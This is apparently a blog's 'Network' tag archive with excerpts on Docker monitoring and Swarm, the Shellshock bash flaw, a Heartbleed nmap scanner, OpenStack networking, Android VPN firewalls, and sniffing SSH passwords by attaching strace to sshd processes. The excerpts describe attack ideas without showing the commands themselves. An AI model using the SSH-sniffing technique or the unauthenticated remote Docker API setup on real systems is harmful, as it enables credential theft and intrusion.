Tag Archives: Network

I needed a way to monitor Docker resource usage and metrics (CPU, Memory, Network, Disk). I also wanted historical data, and ideally, pretty graphs that I could navigate and drill into.

Whatever the solution was going to be, it had to be very open and customizable, easy to setup and scale for a production-like environment (stability, size), and ideally cheap/free. But most of all — it had to make sense and really be straight forward.

3 Containers and 10 minutes is all you need

To get this:

There are 3 components that are started via containers:

Grafana (dashboard/visual metrics and analytics)
InfluxDB (time-series DB)
Telegraf (time-series collector) – 1 per Docker host

The idea is that you first launch Grafana, and then launch InfluxDB. You configure Grafana (via the web) to point to InfluxDB’s IP, and then you setup a Telegraf container on each Docker host that you want to monitor. Telegraf collects all the metrics and feeds them into a central InfluxDB, and Grafana displays them.

Setup Tutorial/Examples

Continue Reading →Monitor Docker resource metrics with Grafana, InfluxDB, and Telegraf

If you have not used Swarm, skim the non-service-discovery tutorial to get a feel for how it works:
https://blog.vpetkov.net/2015/12/07/docker-swarm-tutorial-and-examples. It’s very easy, and it should give you an idea of how it works within a couple of minutes.

Using Swarm with pre-generated static tokens is useful, but there are many benefits to using a service discovery backend. For example, you can utilize network overlays and have common “bridges” that span multiple hosts (https://docs.docker.com/engine/userguide/networking/get-started-overlay/). It also provides service registration and discovery for the Docker containers launched into the Swarm. Now lets get into how to use it with service discovery – which is what you would use in a scaled out environment/production.

Again, assuming you have a bunch of servers running docker:
vm01 (, vm02 (, vm03 (, vm04 (

Normally, you can do “docker ps” on each host for example:
ssh vm01 ‘docker ps’
ssh vm04 ‘docker ps’

If you enable the API for remote bind on each host you can manage them from a central place:
docker -H tcp://vm01:2375 ps
docker -H tcp://vm04:2375 ps
(note: port is optional for default)

But if you want to use all of these docker engines as a cluster, you need Swarm.
Here we will go one step further and use a common service discovery backend (Consul).

Docker Swarm Tutorial with Consul and How-To/Examples

Continue Reading →Docker Swarm Tutorial with Consul (Service Discovery) and Examples

A bit of background and the “old/normal way”

If you use Docker, you very quickly run into a common question: how do you make Docker work across multiple hosts, datacenters, and different clouds. One of the simplest solutions is Docker Swarm. Docker summarizes it best as “a native clustering for Docker…[which] allows you create and access to a pool of Docker hosts using the full suite of Docker tools.”

One of the biggest benefits to using Docker Swarm is that it provides the standard Docker API, which means that all of the existing Docker management tools (and 3rd party products) just work out of the box as they do with a single host. The only difference is that they now scale transparently over multiple hosts.

After reading up on it HERE and HERE, it was evident that this is a pretty simple service, but it wasn’t 100% clear what went where. After searching around the web, I realized that almost all of the tutorials and examples on Docker Swarm involved either docker-machine or very convoluted examples which did not explain what was happening on which component. With that said, here is a very simple Docker Swarm Tutorial with some practical examples.

Assuming you have a bunch of servers running docker:
vm01 (, vm02 (, vm03 (, vm04 (

Continue Reading →Docker Swarm Tutorial and Examples

As some of you may have heard, a very serious remote vulnerability was discovered disclosed today within bash.

A quick summary of the problem is that bash does not properly process function definitions, which can be exported like shell variables. This is a bit like a SQL/XSS injection problem — you provide an “end” to your input, and continue writing other functions/calls after it, which then get executed.

A quick example:

A vulnerable system looks like this:

A patched system looks like this:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x’

Continue Reading →Bash remote exploit vulnerability

UPDATE: Insecure has released v6.46 which contains all of these patches. Just grab the latest and follow the usage info here

If you don’t know what Heartbleed is, you can find out here: http://heartbleed.com/. If you don’t want to read the details above, XKCD put together a great short comic about it: http://xkcd.com/1354/

NOTE: I first put this together 3 days ago, but I am just now releasing after being asked by many people for the package and directions.

The problem: How do you scan a bit more than 5 class B’s (~328000 IP addresses) before any off the vendors (Tenable, Qualys, Rapid7) have released signatures? Easy – you build your own!
The goal was to scan as many IPs as possible at work as quickly as possible.

After using the Heartbleed github project (https://github.com/FiloSottile/Heartbleed) and creating a Dancer web service around it, I realized that there still needed to be a faster way to scan for this. How much faster?

How about a /24 (254 IP addresses) in less than 10 seconds.

I have a patched version of NMAP already (6.40) that has Heartbleed checks.
Again, Insecure has released v.6.46 which has these patches. Grab that and follow these directions

Then, you can scan like this:


If you want cleaner results, for a script, a good way to filter the output will be with something like this:

This produced a clean 2 line result, where if it’s vulnerable, it will have “ssl-heartbleed” under each host/IP address entry.


How to build your own patched NMAP binary?

But what if you don’t trust my binary? Good – let me show you how to build one yourself:

Continue Reading →Ridiculously fast Heartbleed Subnet Scanner – nmap heartbleed howto and tutorial

Setting up the network interfaces is something that seems to give people a hard time (clearly visible here: http://docs.openstack.org/grizzly/basic-install/apt/content/basic-install_network.html). If you follow that guide, one of the most confusing points is how the Open vSwitch fits into the existing architecture.

Assuming you are following the guide, you have 2 networks: -> private -> public

Your Network Controller, again per the guide, will have an internal-network interface of “” and an external-network interface of “”

Your starting network config (/etc/network/interfaces) file will look like this:

Now, you will first install the packages needed:

Then you will start the Open vSwitch:

Continue Reading →OpenStack – Network Controller – Open vSwitch – Network Interfaces Config

The Scenario:

Let’s say you are at a coffee shop with public internet access, and you don’t want someone snooping on your traffic, so you VPN to your work. However, you also don’t want to tunnel personal stuff out of your work VPN (chat, facebook, youtube, your personal email maybe?), so the question becomes, how do you create 2 different firewalls – one that ONLY allows you to VPN and does not allow any other applications access, and one that then controls the traffic within the VPN channel so that you can utilize the connection for some apps but not others?

At this point, there are only 2 “methods” of running a Firewall on Android: having root and managing/accessing IPTables, or, the only alternative – creating a sub-VPN channel that you pipe the traffic over and filter (which does not require root). Unfortunately, the second type (without root) will not work for this, since we will need to utilize the VPN channel ourselves for our VPN, and to my knowledge, Android let’s you setup only 1 active VPN channel. So, you need 1.) a way to root and 2.) a good Firewall

Continue Reading →Firewall the Inside of your OpenVPN or L2TP/IPSec Tunnel on Android

I read an interesting article last night which highlited some problems with the way SSH process communication happens. I am writing a post about it because it is so simple and yet so effective.

Here is the scenario:
Let’s say that you have a linux system running the latest set of patches/OpenSSH. You have multiple users on the system, and one or more of them have sudo/su/escalated privileges. The idea is that when user ‘A’ connects to the system, user ‘C’ will be able to sniff out their password.

The details:
The idea is that almost all ssh daemons by default are configured to use “Privilege Separation”. This means that sshd spawns a process (child) that is unprivileged to listen for incoming network requests. After the user authenticates, another process gets created running as the authenticated user. The magic happens in between these two processes.

A simple example:
User ‘C’ ssh-es into the system, escalates their privledges (either by legitimate or non-legitimate means) and starts listening for newly created ssh ‘net’ processes. As soon as user ‘C’ sees a process being crated, they immediately attach strace to it.

A simple way to do it is by:

or even better:


Continue Reading →Sniffing SSH Password from the Server Side